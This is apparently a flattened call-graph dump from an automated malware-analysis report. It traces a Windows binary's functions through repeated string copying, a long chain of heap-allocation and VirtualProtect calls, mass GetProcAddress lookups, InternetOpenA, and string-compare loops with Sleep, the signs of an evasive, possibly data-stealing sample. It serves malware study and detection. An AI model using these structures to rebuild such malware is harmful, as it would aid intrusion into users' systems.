lstrcpy 13665->13666 13667 fc5de9 13666->13667 13668 fb1590 lstrcpy 13667->13668 13669 fc5dfd 13668->13669 14758 fb5960 13669->14758 13671 fc5e03 14902 fc1050 13671->14902 13673 fc5e0e 13674 fca740 lstrcpy 13673->13674 13675 fc5e32 13674->13675 13676 fb1590 lstrcpy 13675->13676 13677 fc5e46 13676->13677 13678 fb5960 34 API calls 13677->13678 13679 fc5e4c 13678->13679 14906 fc0d90 13679->14906 13681 fc5e57 13682 fca740 lstrcpy 13681->13682 13683 fc5e79 13682->13683 13684 fb1590 lstrcpy 13683->13684 13685 fc5e8d 13684->13685 13686 fb5960 34 API calls 13685->13686 13687 fc5e93 13686->13687 14913 fc0f40 13687->14913 13689 fc5e9e 13690 fb1590 lstrcpy 13689->13690 13691 fc5eb5 13690->13691 14918 fc1a10 13691->14918 13693 fc5eba 13694 fca740 lstrcpy 13693->13694 13695 fc5ed6 13694->13695 15262 fb4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13695->15262 13697 fc5edb 13698 fb1590 lstrcpy 13697->13698 13699 fc5f5b 13698->13699 15269 fc0740 13699->15269 13701 fc5f60 13702 fca740 lstrcpy 13701->13702 13703 fc5f86 13702->13703 13704 fb1590 lstrcpy 13703->13704 13705 fc5f9a 13704->13705 13706 fb5960 34 API calls 13705->13706 13801 fb45d1 RtlAllocateHeap 13800->13801 13803 fb4621 VirtualProtect 13801->13803 13803->13449 13805->13536 13808 fb10c2 codecvt 13806->13808 13807 fb10fd 13807->13566 13808->13807 13809 fb10e2 VirtualFree 13808->13809 13809->13807 13811 fb1233 GlobalMemoryStatusEx 13810->13811 13811->13570 13812->13593 13814 fca7c2 13813->13814 13815 fca7ec 13814->13815 13816 fca7da lstrcpy 13814->13816 13815->13598 13816->13815 13818 fca740 lstrcpy 13817->13818 13819 fc6833 13818->13819 13820 fca9b0 4 API calls 13819->13820 13821 fc6845 13820->13821 13822 fca8a0 lstrcpy 13821->13822 13823 fc684e 13822->13823 13824 fca9b0 4 API calls 13823->13824 13825 fc6867 13824->13825 13826 fca8a0 lstrcpy 13825->13826 13827 fc6870 13826->13827 13828 fca9b0 4 API calls 13827->13828 13829 fc688a 13828->13829 13830 fca8a0 lstrcpy 13829->13830 13831 fc6893 13830->13831 13832 fca9b0 4 API calls 13831->13832 13833 fc68ac 13832->13833 13834 fca8a0 lstrcpy 13833->13834 13835 fc68b5 13834->13835 13836 fca9b0 4 API calls 13835->13836 13837 fc68cf 13836->13837 13838 fca8a0 lstrcpy 13837->13838 13839 fc68d8 13838->13839 13840 fca9b0 4 API calls 13839->13840 13841 fc68f3 13840->13841 13842 fca8a0 lstrcpy 13841->13842 13843 fc68fc 13842->13843 13844 fca7a0 lstrcpy 13843->13844 13845 fc6910 13844->13845 13845->13605 13847 fca812 13846->13847 13847->13608 13850 fca83f 13848->13850 13849 fc5b54 13849->13618 13850->13849 13851 fca87b lstrcpy 13850->13851 13851->13849 13853 fca8a0 lstrcpy 13852->13853 13854 fc6443 13853->13854 13855 fca8a0 lstrcpy 13854->13855 13856 fc6455 13855->13856 13857 fca8a0 lstrcpy 13856->13857 13858 fc6467 13857->13858 13859 fca8a0 lstrcpy 13858->13859 13860 fc5b86 13859->13860 13860->13624 13862 fb45c0 2 API calls 13861->13862 13863 fb26b4 13862->13863 13864 fb45c0 2 API calls 13863->13864 13865 fb26d7 13864->13865 13866 fb45c0 2 API calls 13865->13866 13867 fb26f0 13866->13867 13868 fb45c0 2 API calls 13867->13868 13869 fb2709 13868->13869 13870 fb45c0 2 API calls 13869->13870 13871 fb2736 13870->13871 13872 fb45c0 2 API calls 13871->13872 13873 fb274f 13872->13873 13874 fb45c0 2 API calls 13873->13874 13875 fb2768 13874->13875 13876 fb45c0 2 API calls 13875->13876 13877 fb2795 13876->13877 13878 fb45c0 2 API calls 13877->13878 13879 fb27ae 13878->13879 13880 fb45c0 2 API calls 13879->13880 13881 fb27c7 13880->13881 13882 fb45c0 2 API calls 13881->13882 13883 fb27e0 13882->13883 13884 fb45c0 2 API calls 13883->13884 13885 fb27f9 13884->13885 13886 fb45c0 2 API calls 13885->13886 13887 fb2812 13886->13887 13888 fb45c0 2 API calls 13887->13888 13889 fb282b 13888->13889 13890 fb45c0 2 API calls 13889->13890 13891 fb2844 13890->13891 13892 fb45c0 2 API calls 13891->13892 13893 fb285d 13892->13893 13894 fb45c0 2 API calls 13893->13894 13895 fb2876 13894->13895 13896 fb45c0 2 API calls 13895->13896 13897 fb288f 13896->13897 13898 fb45c0 2 API calls 13897->13898 13899 fb28a8 13898->13899 13900 fb45c0 2 API calls 13899->13900 13901 fb28c1 13900->13901 13902 fb45c0 2 API calls 13901->13902 13903 fb28da 13902->13903 13904 fb45c0 2 API calls 13903->13904 13905 fb28f3 13904->13905 13906 fb45c0 2 API calls 13905->13906 13907 fb290c 13906->13907 13908 fb45c0 2 API calls 13907->13908 13909 fb2925 13908->13909 13910 fb45c0 2 API calls 13909->13910 13911 fb293e 13910->13911 13912 fb45c0 2 API calls 13911->13912 13913 fb2957 13912->13913 13914 fb45c0 2 API calls 13913->13914 13915 fb2970 13914->13915 13916 fb45c0 2 API calls 13915->13916 13917 fb2989 13916->13917 13918 fb45c0 2 API calls 13917->13918 13919 fb29a2 13918->13919 13920 fb45c0 2 API calls 13919->13920 13921 fb29bb 13920->13921 13922 fb45c0 2 API calls 13921->13922 13923 fb29d4 13922->13923 13924 fb45c0 2 API calls 13923->13924 13925 fb29ed 13924->13925 13926 fb45c0 2 API calls 13925->13926 13927 fb2a06 13926->13927 13928 fb45c0 2 API calls 13927->13928 13929 fb2a1f 13928->13929 13930 fb45c0 2 API calls 13929->13930 13931 fb2a38 13930->13931 13932 fb45c0 2 API calls 13931->13932 13933 fb2a51 13932->13933 13934 fb45c0 2 API calls 13933->13934 13935 fb2a6a 13934->13935 13936 fb45c0 2 API calls 13935->13936 13937 fb2a83 13936->13937 13938 fb45c0 2 API calls 13937->13938 13939 fb2a9c 13938->13939 13940 fb45c0 2 API calls 13939->13940 13941 fb2ab5 13940->13941 13942 fb45c0 2 API calls 13941->13942 13943 fb2ace 13942->13943 13944 fb45c0 2 API calls 13943->13944 13945 fb2ae7 13944->13945 13946 fb45c0 2 API calls 13945->13946 13947 fb2b00 13946->13947 13948 fb45c0 2 API calls 13947->13948 13949 fb2b19 13948->13949 13950 fb45c0 2 API calls 13949->13950 13951 fb2b32 13950->13951 13952 fb45c0 2 API calls 13951->13952 13953 fb2b4b 13952->13953 13954 fb45c0 2 API calls 13953->13954 13955 fb2b64 13954->13955 13956 fb45c0 2 API calls 13955->13956 13957 fb2b7d 13956->13957 13958 fb45c0 2 API calls 13957->13958 13959 fb2b96 13958->13959 13960 fb45c0 2 API calls 13959->13960 13961 fb2baf 13960->13961 13962 fb45c0 2 API calls 13961->13962 13963 fb2bc8 13962->13963 13964 fb45c0 2 API calls 13963->13964 13965 fb2be1 13964->13965 13966 fb45c0 2 API calls 13965->13966 13967 fb2bfa 13966->13967 13968 fb45c0 2 API calls 13967->13968 13969 fb2c13 13968->13969 13970 fb45c0 2 API calls 13969->13970 13971 fb2c2c 13970->13971 13972 fb45c0 2 API calls 13971->13972 13973 fb2c45 13972->13973 13974 fb45c0 2 API calls 13973->13974 13975 fb2c5e 13974->13975 13976 fb45c0 2 API calls 13975->13976 13977 fb2c77 13976->13977 13978 fb45c0 2 API calls 13977->13978 13979 fb2c90 13978->13979 13980 fb45c0 2 API calls 13979->13980 13981 fb2ca9 13980->13981 13982 fb45c0 2 API calls 13981->13982 13983 fb2cc2 13982->13983 13984 fb45c0 2 API calls 13983->13984 13985 fb2cdb 13984->13985 13986 fb45c0 2 API calls 13985->13986 13987 fb2cf4 13986->13987 13988 fb45c0 2 API calls 13987->13988 13989 fb2d0d 13988->13989 13990 fb45c0 2 API calls 13989->13990 13991 fb2d26 13990->13991 13992 fb45c0 2 API calls 13991->13992 13993 fb2d3f 13992->13993 13994 fb45c0 2 API calls 13993->13994 13995 fb2d58 13994->13995 13996 fb45c0 2 API calls 13995->13996 13997 fb2d71 13996->13997 13998 fb45c0 2 API calls 13997->13998 13999 fb2d8a 13998->13999 14000 fb45c0 2 API calls 13999->14000 14001 fb2da3 14000->14001 14002 fb45c0 2 API calls 14001->14002 14003 fb2dbc 14002->14003 14004 fb45c0 2 API calls 14003->14004 14005 fb2dd5 14004->14005 14006 fb45c0 2 API calls 14005->14006 14007 fb2dee 14006->14007 14008 fb45c0 2 API calls 14007->14008 14009 fb2e07 14008->14009 14010 fb45c0 2 API calls 14009->14010 14011 fb2e20 14010->14011 14012 fb45c0 2 API calls 14011->14012 14013 fb2e39 14012->14013 14014 fb45c0 2 API calls 14013->14014 14015 fb2e52 14014->14015 14016 fb45c0 2 API calls 14015->14016 14017 fb2e6b 14016->14017 14018 fb45c0 2 API calls 14017->14018 14019 fb2e84 14018->14019 14020 fb45c0 2 API calls 14019->14020 14021 fb2e9d 14020->14021 14022 fb45c0 2 API calls 14021->14022 14023 fb2eb6 14022->14023 14024 fb45c0 2 API calls 14023->14024 14025 fb2ecf 14024->14025 14026 fb45c0 2 API calls 14025->14026 14027 fb2ee8 14026->14027 14028 fb45c0 2 API calls 14027->14028 14029 fb2f01 14028->14029 14030 fb45c0 2 API calls 14029->14030 14031 fb2f1a 14030->14031 14032 fb45c0 2 API calls 14031->14032 14033 fb2f33 14032->14033 14034 fb45c0 2 API calls 14033->14034 14035 fb2f4c 14034->14035 14036 fb45c0 2 API calls 14035->14036 14037 fb2f65 14036->14037 14038 fb45c0 2 API calls 14037->14038 14039 fb2f7e 14038->14039 14040 fb45c0 2 API calls 14039->14040 14041 fb2f97 14040->14041 14042 fb45c0 2 API calls 14041->14042 14043 fb2fb0 14042->14043 14044 fb45c0 2 API calls 14043->14044 14045 fb2fc9 14044->14045 14046 fb45c0 2 API calls 14045->14046 14047 fb2fe2 14046->14047 14048 fb45c0 2 API calls 14047->14048 14049 fb2ffb 14048->14049 14050 fb45c0 2 API calls 14049->14050 14051 fb3014 14050->14051 14052 fb45c0 2 API calls 14051->14052 14053 fb302d 14052->14053 14054 fb45c0 2 API calls 14053->14054 14055 fb3046 14054->14055 14056 fb45c0 2 API calls 14055->14056 14057 fb305f 14056->14057 14058 fb45c0 2 API calls 14057->14058 14059 fb3078 14058->14059 14060 fb45c0 2 API calls 14059->14060 14061 fb3091 14060->14061 14062 fb45c0 2 API calls 14061->14062 14063 fb30aa 14062->14063 14064 fb45c0 2 API calls 14063->14064 14065 fb30c3 14064->14065 14066 fb45c0 2 API calls 14065->14066 14067 fb30dc 14066->14067 14068 fb45c0 2 API calls 14067->14068 14069 fb30f5 14068->14069 14070 fb45c0 2 API calls 14069->14070 14071 fb310e 14070->14071 14072 fb45c0 2 API calls 14071->14072 14073 fb3127 14072->14073 14074 fb45c0 2 API calls 14073->14074 14075 fb3140 14074->14075 14076 fb45c0 2 API calls 14075->14076 14077 fb3159 14076->14077 14078 fb45c0 2 API calls 14077->14078 14079 fb3172 14078->14079 14080 fb45c0 2 API calls 14079->14080 14081 fb318b 14080->14081 14082 fb45c0 2 API calls 14081->14082 14083 fb31a4 14082->14083 14084 fb45c0 2 API calls 14083->14084 14085 fb31bd 14084->14085 14086 fb45c0 2 API calls 14085->14086 14087 fb31d6 14086->14087 14088 fb45c0 2 API calls 14087->14088 14089 fb31ef 14088->14089 14090 fb45c0 2 API calls 14089->14090 14091 fb3208 14090->14091 14092 fb45c0 2 API calls 14091->14092 14093 fb3221 14092->14093 14094 fb45c0 2 API calls 14093->14094 14095 fb323a 14094->14095 14096 fb45c0 2 API calls 14095->14096 14097 fb3253 14096->14097 14098 fb45c0 2 API calls 14097->14098 14099 fb326c 14098->14099 14100 fb45c0 2 API calls 14099->14100 14101 fb3285 14100->14101 14102 fb45c0 2 API calls 14101->14102 14103 fb329e 14102->14103 14104 fb45c0 2 API calls 14103->14104 14105 fb32b7 14104->14105 14106 fb45c0 2 API calls 14105->14106 14107 fb32d0 14106->14107 14108 fb45c0 2 API calls 14107->14108 14109 fb32e9 14108->14109 14110 fb45c0 2 API calls 14109->14110 14111 fb3302 14110->14111 14112 fb45c0 2 API calls 14111->14112 14113 fb331b 14112->14113 14114 fb45c0 2 API calls 14113->14114 14115 fb3334 14114->14115 14116 fb45c0 2 API calls 14115->14116 14117 fb334d 14116->14117 14118 fb45c0 2 API calls 14117->14118 14119 fb3366 14118->14119 14120 fb45c0 2 API calls 14119->14120 14121 fb337f 14120->14121 14122 fb45c0 2 API calls 14121->14122 14123 fb3398 14122->14123 14124 fb45c0 2 API calls 14123->14124 14125 fb33b1 14124->14125 14126 fb45c0 2 API calls 14125->14126 14127 fb33ca 14126->14127 14128 fb45c0 2 API calls 14127->14128 14129 fb33e3 14128->14129 14130 fb45c0 2 API calls 14129->14130 14131 fb33fc 14130->14131 14132 fb45c0 2 API calls 14131->14132 14133 fb3415 14132->14133 14134 fb45c0 2 API calls 14133->14134 14135 fb342e 14134->14135 14136 fb45c0 2 API calls 14135->14136 14137 fb3447 14136->14137 14138 fb45c0 2 API calls 14137->14138 14139 fb3460 14138->14139 14140 fb45c0 2 API calls 14139->14140 14141 fb3479 14140->14141 14142 fb45c0 2 API calls 14141->14142 14143 fb3492 14142->14143 14144 fb45c0 2 API calls 14143->14144 14145 fb34ab 14144->14145 14146 fb45c0 2 API calls 14145->14146 14147 fb34c4 14146->14147 14148 fb45c0 2 API calls 14147->14148 14149 fb34dd 14148->14149 14150 fb45c0 2 API calls 14149->14150 14151 fb34f6 14150->14151 14152 fb45c0 2 API calls 14151->14152 14153 fb350f 14152->14153 14154 fb45c0 2 API calls 14153->14154 14155 fb3528 14154->14155 14156 fb45c0 2 API calls 14155->14156 14157 fb3541 14156->14157 14158 fb45c0 2 API calls 14157->14158 14159 fb355a 14158->14159 14160 fb45c0 2 API calls 14159->14160 14161 fb3573 14160->14161 14162 fb45c0 2 API calls 14161->14162 14163 fb358c 14162->14163 14164 fb45c0 2 API calls 14163->14164 14165 fb35a5 14164->14165 14166 fb45c0 2 API calls 14165->14166 14167 fb35be 14166->14167 14168 fb45c0 2 API calls 14167->14168 14169 fb35d7 14168->14169 14170 fb45c0 2 API calls 14169->14170 14171 fb35f0 14170->14171 14172 fb45c0 2 API calls 14171->14172 14173 fb3609 14172->14173 14174 fb45c0 2 API calls 14173->14174 14175 fb3622 14174->14175 14176 fb45c0 2 API calls 14175->14176 14177 fb363b 14176->14177 14178 fb45c0 2 API calls 14177->14178 14179 fb3654 14178->14179 14180 fb45c0 2 API calls 14179->14180 14181 fb366d 14180->14181 14182 fb45c0 2 API calls 14181->14182 14183 fb3686 14182->14183 14184 fb45c0 2 API calls 14183->14184 14185 fb369f 14184->14185 14186 fb45c0 2 API calls 14185->14186 14187 fb36b8 14186->14187 14188 fb45c0 2 API calls 14187->14188 14189 fb36d1 14188->14189 14190 fb45c0 2 API calls 14189->14190 14191 fb36ea 14190->14191 14192 fb45c0 2 API calls 14191->14192 14193 fb3703 14192->14193 14194 fb45c0 2 API calls 14193->14194 14195 fb371c 14194->14195 14196 fb45c0 2 API calls 14195->14196 14197 fb3735 14196->14197 14198 fb45c0 2 API calls 14197->14198 14199 fb374e 14198->14199 14200 fb45c0 2 API calls 14199->14200 14201 fb3767 14200->14201 14202 fb45c0 2 API calls 14201->14202 14203 fb3780 14202->14203 14204 fb45c0 2 API calls 14203->14204 14205 fb3799 14204->14205 14206 fb45c0 2 API calls 14205->14206 14207 fb37b2 14206->14207 14208 fb45c0 2 API calls 14207->14208 14209 fb37cb 14208->14209 14210 fb45c0 2 API calls 14209->14210 14211 fb37e4 14210->14211 14212 fb45c0 2 API calls 14211->14212 14213 fb37fd 14212->14213 14214 fb45c0 2 API calls 14213->14214 14215 fb3816 14214->14215 14216 fb45c0 2 API calls 14215->14216 14217 fb382f 14216->14217 14218 fb45c0 2 API calls 14217->14218 14219 fb3848 14218->14219 14220 fb45c0 2 API calls 14219->14220 14221 fb3861 14220->14221 14222 fb45c0 2 API calls 14221->14222 14223 fb387a 14222->14223 14224 fb45c0 2 API calls 14223->14224 14225 fb3893 14224->14225 14226 fb45c0 2 API calls 14225->14226 14227 fb38ac 14226->14227 14228 fb45c0 2 API calls 14227->14228 14229 fb38c5 14228->14229 14230 fb45c0 2 API calls 14229->14230 14231 fb38de 14230->14231 14232 fb45c0 2 API calls 14231->14232 14233 fb38f7 14232->14233 14234 fb45c0 2 API calls 14233->14234 14235 fb3910 14234->14235 14236 fb45c0 2 API calls 14235->14236 14237 fb3929 14236->14237 14238 fb45c0 2 API calls 14237->14238 14239 fb3942 14238->14239 14240 fb45c0 2 API calls 14239->14240 14241 fb395b 14240->14241 14242 fb45c0 2 API calls 14241->14242 14243 fb3974 14242->14243 14244 fb45c0 2 API calls 14243->14244 14245 fb398d 14244->14245 14246 fb45c0 2 API calls 14245->14246 14247 fb39a6 14246->14247 14248 fb45c0 2 API calls 14247->14248 14249 fb39bf 14248->14249 14250 fb45c0 2 API calls 14249->14250 14251 fb39d8 14250->14251 14252 fb45c0 2 API calls 14251->14252 14253 fb39f1 14252->14253 14254 fb45c0 2 API calls 14253->14254 14255 fb3a0a 14254->14255 14256 fb45c0 2 API calls 14255->14256 14257 fb3a23 14256->14257 14258 fb45c0 2 API calls 14257->14258 14259 fb3a3c 14258->14259 14260 fb45c0 2 API calls 14259->14260 14261 fb3a55 14260->14261 14262 fb45c0 2 API calls 14261->14262 14263 fb3a6e 14262->14263 14264 fb45c0 2 API calls 14263->14264 14265 fb3a87 14264->14265 14266 fb45c0 2 API calls 14265->14266 14267 fb3aa0 14266->14267 14268 fb45c0 2 API calls 14267->14268 14269 fb3ab9 14268->14269 14270 fb45c0 2 API calls 14269->14270 14271 fb3ad2 14270->14271 14272 fb45c0 2 API calls 14271->14272 14273 fb3aeb 14272->14273 14274 fb45c0 2 API calls 14273->14274 14275 fb3b04 14274->14275 14276 fb45c0 2 API calls 14275->14276 14277 fb3b1d 14276->14277 14278 fb45c0 2 API calls 14277->14278 14279 fb3b36 14278->14279 14280 fb45c0 2 API calls 14279->14280 14281 fb3b4f 14280->14281 14282 fb45c0 2 API calls 14281->14282 14283 fb3b68 14282->14283 14284 fb45c0 2 API calls 14283->14284 14285 fb3b81 14284->14285 14286 fb45c0 2 API calls 14285->14286 14287 fb3b9a 14286->14287 14288 fb45c0 2 API calls 14287->14288 14289 fb3bb3 14288->14289 14290 fb45c0 2 API calls 14289->14290 14291 fb3bcc 14290->14291 14292 fb45c0 2 API calls 14291->14292 14293 fb3be5 14292->14293 14294 fb45c0 2 API calls 14293->14294 14295 fb3bfe 14294->14295 14296 fb45c0 2 API calls 14295->14296 14297 fb3c17 14296->14297 14298 fb45c0 2 API calls 14297->14298 14299 fb3c30 14298->14299 14300 fb45c0 2 API calls 14299->14300 14301 fb3c49 14300->14301 14302 fb45c0 2 API calls 14301->14302 14303 fb3c62 14302->14303 14304 fb45c0 2 API calls 14303->14304 14305 fb3c7b 14304->14305 14306 fb45c0 2 API calls 14305->14306 14307 fb3c94 14306->14307 14308 fb45c0 2 API calls 14307->14308 14309 fb3cad 14308->14309 14310 fb45c0 2 API calls 14309->14310 14311 fb3cc6 14310->14311 14312 fb45c0 2 API calls 14311->14312 14313 fb3cdf 14312->14313 14314 fb45c0 2 API calls 14313->14314 14315 fb3cf8 14314->14315 14316 fb45c0 2 API calls 14315->14316 14317 fb3d11 14316->14317 14318 fb45c0 2 API calls 14317->14318 14319 fb3d2a 14318->14319 14320 fb45c0 2 API calls 14319->14320 14321 fb3d43 14320->14321 14322 fb45c0 2 API calls 14321->14322 14323 fb3d5c 14322->14323 14324 fb45c0 2 API calls 14323->14324 14325 fb3d75 14324->14325 14326 fb45c0 2 API calls 14325->14326 14327 fb3d8e 14326->14327 14328 fb45c0 2 API calls 14327->14328 14329 fb3da7 14328->14329 14330 fb45c0 2 API calls 14329->14330 14331 fb3dc0 14330->14331 14332 fb45c0 2 API calls 14331->14332 14333 fb3dd9 14332->14333 14334 fb45c0 2 API calls 14333->14334 14335 fb3df2 14334->14335 14336 fb45c0 2 API calls 14335->14336 14337 fb3e0b 14336->14337 14338 fb45c0 2 API calls 14337->14338 14339 fb3e24 14338->14339 14340 fb45c0 2 API calls 14339->14340 14341 fb3e3d 14340->14341 14342 fb45c0 2 API calls 14341->14342 14343 fb3e56 14342->14343 14344 fb45c0 2 API calls 14343->14344 14345 fb3e6f 14344->14345 14346 fb45c0 2 API calls 14345->14346 14347 fb3e88 14346->14347 14348 fb45c0 2 API calls 14347->14348 14349 fb3ea1 14348->14349 14350 fb45c0 2 API calls 14349->14350 14351 fb3eba 14350->14351 14352 fb45c0 2 API calls 14351->14352 14353 fb3ed3 14352->14353 14354 fb45c0 2 API calls 14353->14354 14355 fb3eec 14354->14355 14356 fb45c0 2 API calls 14355->14356 14357 fb3f05 14356->14357 14358 fb45c0 2 API calls 14357->14358 14359 fb3f1e 14358->14359 14360 fb45c0 2 API calls 14359->14360 14361 fb3f37 14360->14361 14362 fb45c0 2 API calls 14361->14362 14363 fb3f50 14362->14363 14364 fb45c0 2 API calls 14363->14364 14365 fb3f69 14364->14365 14366 fb45c0 2 API calls 14365->14366 14367 fb3f82 14366->14367 14368 fb45c0 2 API calls 14367->14368 14369 fb3f9b 14368->14369 14370 fb45c0 2 API calls 14369->14370 14371 fb3fb4 14370->14371 14372 fb45c0 2 API calls 14371->14372 14373 fb3fcd 14372->14373 14374 fb45c0 2 API calls 14373->14374 14375 fb3fe6 14374->14375 14376 fb45c0 2 API calls 14375->14376 14377 fb3fff 14376->14377 14378 fb45c0 2 API calls 14377->14378 14379 fb4018 14378->14379 14380 fb45c0 2 API calls 14379->14380 14381 fb4031 14380->14381 14382 fb45c0 2 API calls 14381->14382 14383 fb404a 14382->14383 14384 fb45c0 2 API calls 14383->14384 14385 fb4063 14384->14385 14386 fb45c0 2 API calls 14385->14386 14387 fb407c 14386->14387 14388 fb45c0 2 API calls 14387->14388 14389 fb4095 14388->14389 14390 fb45c0 2 API calls 14389->14390 14391 fb40ae 14390->14391 14392 fb45c0 2 API calls 14391->14392 14393 fb40c7 14392->14393 14394 fb45c0 2 API calls 14393->14394 14395 fb40e0 14394->14395 14396 fb45c0 2 API calls 14395->14396 14397 fb40f9 14396->14397 14398 fb45c0 2 API calls 14397->14398 14399 fb4112 14398->14399 14400 fb45c0 2 API calls 14399->14400 14401 fb412b 14400->14401 14402 fb45c0 2 API calls 14401->14402 14403 fb4144 14402->14403 14404 fb45c0 2 API calls 14403->14404 14405 fb415d 14404->14405 14406 fb45c0 2 API calls 14405->14406 14407 fb4176 14406->14407 14408 fb45c0 2 API calls 14407->14408 14409 fb418f 14408->14409 14410 fb45c0 2 API calls 14409->14410 14411 fb41a8 14410->14411 14412 fb45c0 2 API calls 14411->14412 14413 fb41c1 14412->14413 14414 fb45c0 2 API calls 14413->14414 14415 fb41da 14414->14415 14416 fb45c0 2 API calls 14415->14416 14417 fb41f3 14416->14417 14418 fb45c0 2 API calls 14417->14418 14419 fb420c 14418->14419 14420 fb45c0 2 API calls 14419->14420 14421 fb4225 14420->14421 14422 fb45c0 2 API calls 14421->14422 14423 fb423e 14422->14423 14424 fb45c0 2 API calls 14423->14424 14425 fb4257 14424->14425 14426 fb45c0 2 API calls 14425->14426 14427 fb4270 14426->14427 14428 fb45c0 2 API calls 14427->14428 14429 fb4289 14428->14429 14430 fb45c0 2 API calls 14429->14430 14431 fb42a2 14430->14431 14432 fb45c0 2 API calls 14431->14432 14433 fb42bb 14432->14433 14434 fb45c0 2 API calls 14433->14434 14435 fb42d4 14434->14435 14436 fb45c0 2 API calls 14435->14436 14437 fb42ed 14436->14437 14438 fb45c0 2 API calls 14437->14438 14439 fb4306 14438->14439 14440 fb45c0 2 API calls 14439->14440 14441 fb431f 14440->14441 14442 fb45c0 2 API calls 14441->14442 14443 fb4338 14442->14443 14444 fb45c0 2 API calls 14443->14444 14445 fb4351 14444->14445 14446 fb45c0 2 API calls 14445->14446 14447 fb436a 14446->14447 14448 fb45c0 2 API calls 14447->14448 14449 fb4383 14448->14449 14450 fb45c0 2 API calls 14449->14450 14451 fb439c 14450->14451 14452 fb45c0 2 API calls 14451->14452 14453 fb43b5 14452->14453 14454 fb45c0 2 API calls 14453->14454 14455 fb43ce 14454->14455 14456 fb45c0 2 API calls 14455->14456 14457 fb43e7 14456->14457 14458 fb45c0 2 API calls 14457->14458 14459 fb4400 14458->14459 14460 fb45c0 2 API calls 14459->14460 14461 fb4419 14460->14461 14462 fb45c0 2 API calls 14461->14462 14463 fb4432 14462->14463 14464 fb45c0 2 API calls 14463->14464 14465 fb444b 14464->14465 14466 fb45c0 2 API calls 14465->14466 14467 fb4464 14466->14467 14468 fb45c0 2 API calls 14467->14468 14469 fb447d 14468->14469 14470 fb45c0 2 API calls 14469->14470 14471 fb4496 14470->14471 14472 fb45c0 2 API calls 14471->14472 14473 fb44af 14472->14473 14474 fb45c0 2 API calls 14473->14474 14475 fb44c8 14474->14475 14476 fb45c0 2 API calls 14475->14476 14477 fb44e1 14476->14477 14478 fb45c0 2 API calls 14477->14478 14479 fb44fa 14478->14479 14480 fb45c0 2 API calls 14479->14480 14481 fb4513 14480->14481 14482 fb45c0 2 API calls 14481->14482 14483 fb452c 14482->14483 14484 fb45c0 2 API calls 14483->14484 14485 fb4545 14484->14485 14486 fb45c0 2 API calls 14485->14486 14487 fb455e 14486->14487 14488 fb45c0 2 API calls 14487->14488 14489 fb4577 14488->14489 14490 fb45c0 2 API calls 14489->14490 14491 fb4590 14490->14491 14492 fb45c0 2 API calls 14491->14492 14493 fb45a9 14492->14493 14494 fc9c10 14493->14494 14495 fca036 8 API calls 14494->14495 14496 fc9c20 43 API calls 14494->14496 14497 fca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14495->14497 14498 fca146 14495->14498 14496->14495 14497->14498 14499 fca216 14498->14499 14500 fca153 8 API calls 14498->14500 14501 fca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14499->14501 14502 fca298 14499->14502 14500->14499 14501->14502 14503 fca2a5 6 API calls 14502->14503 14504 fca337 14502->14504 14503->14504 14505 fca41f 14504->14505 14506 fca344 9 API calls 14504->14506 14507 fca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14505->14507 14508 fca4a2 14505->14508 14506->14505 14507->14508 14509 fca4dc 14508->14509 14510 fca4ab GetProcAddress GetProcAddress 14508->14510 14511 fca515 14509->14511 14512 fca4e5 GetProcAddress GetProcAddress 14509->14512 14510->14509 14513 fca612 14511->14513 14514 fca522 10 API calls 14511->14514 14512->14511 14515 fca67d 14513->14515 14516 fca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14513->14516 14514->14513 14517 fca69e 14515->14517 14518 fca686 GetProcAddress 14515->14518 14516->14515 14519 fc5ca3 14517->14519 14520 fca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14517->14520 14518->14517 14521 fb1590 14519->14521 14520->14519 15642 fb1670 14521->15642 14524 fca7a0 lstrcpy 14525 fb15b5 14524->14525 14526 fca7a0 lstrcpy 14525->14526 14527 fb15c7 14526->14527 14528 fca7a0 lstrcpy 14527->14528 14529 fb15d9 14528->14529 14530 fca7a0 lstrcpy 14529->14530 14531 fb1663 14530->14531 14532 fc5510 14531->14532 14533 fc5521 14532->14533 14534 fca820 2 API calls 14533->14534 14535 fc552e 14534->14535 14536 fca820 2 API calls 14535->14536 14537 fc553b 14536->14537 14538 fca820 2 API calls 14537->14538 14539 fc5548 14538->14539 14540 fca740 lstrcpy 14539->14540 14541 fc5555 14540->14541 14542 fca740 lstrcpy 14541->14542 14543 fc5562 14542->14543 14544 fca740 lstrcpy 14543->14544 14545 fc556f 14544->14545 14546 fca740 lstrcpy 14545->14546 14571 fc557c 14546->14571 14547 fb1590 lstrcpy 14547->14571 14548 fc52c0 25 API calls 14548->14571 14549 fc51f0 20 API calls 14549->14571 14550 fc5643 StrCmpCA 14550->14571 14551 fc56a0 StrCmpCA 14552 fc57dc 14551->14552 14551->14571 14553 fca8a0 lstrcpy 14552->14553 14554 fc57e8 14553->14554 14555 fca820 2 API calls 14554->14555 14557 fc57f6 14555->14557 14556 fca820 lstrlen lstrcpy 14556->14571 14559 fca820 2 API calls 14557->14559 14558 fc5856 StrCmpCA 14560 fc5991 14558->14560 14558->14571 14564 fc5805 14559->14564 14563 fca8a0 lstrcpy 14560->14563 14561 fca740 lstrcpy 14561->14571 14562 fca8a0 lstrcpy 14562->14571 14565 fc599d 14563->14565 14566 fb1670 lstrcpy 14564->14566 14567 fca820 2 API calls 14565->14567 14568 fc5811 14566->14568 14569 fc59ab 14567->14569 14568->13639 14572 fca820 2 API calls 14569->14572 14570 fc5a0b StrCmpCA 14573 fc5a28 14570->14573 14574 fc5a16 Sleep 14570->14574 14571->14547 14571->14548 14571->14549 14571->14550 14571->14551 14571->14556 14571->14558 14571->14561 14571->14562 14571->14570 14583 fc578a StrCmpCA 14571->14583 14585 fc593f StrCmpCA 14571->14585 14586 fca7a0 lstrcpy 14571->14586 14575 fc59ba 14572->14575 14576 fca8a0 lstrcpy 14573->14576 14574->14571 14578 fb1670 lstrcpy 14575->14578 14577 fc5a34 14576->14577 14579 fca820 2 API calls 14577->14579 14578->14568 14580 fc5a43 14579->14580 14581 fca820 2 API calls 14580->14581 14582 fc5a52 14581->14582 14584 fb1670 lstrcpy 14582->14584 14583->14571 14584->14568 14585->14571 14586->14571 14588 fc754c 14587->14588 14589 fc7553 GetVolumeInformationA 14587->14589 14588->14589 14590 fc7591 14589->14590 14591 fc75fc GetProcessHeap 